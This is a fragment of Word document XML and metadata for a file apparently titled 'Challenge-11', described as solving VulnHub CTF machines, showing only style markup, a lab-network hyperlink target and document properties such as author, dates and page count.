    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006B74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74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yperlink" Target="http://172.20.10.2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8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2026-03-25T00:00:00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67A08B-8C17-43FE-BC1E-4AC771495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475</TotalTime>
  <Pages>17</Pages>
  <Words>780</Words>
  <Characters>4450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Challenge-10</vt:lpstr>
    </vt:vector>
  </TitlesOfParts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Challenge-11</dc:title>
  <dc:subject>Solving CTF Machines from VulnHub</dc:subject>
  <dc:creator>YUVARAJ M</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>yuvaraj m</cp:lastModifiedBy>
  <cp:revision>21</cp:revision>
  <cp:lastPrinted>2026-03-10T06:54:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-23T05:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-25T13:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>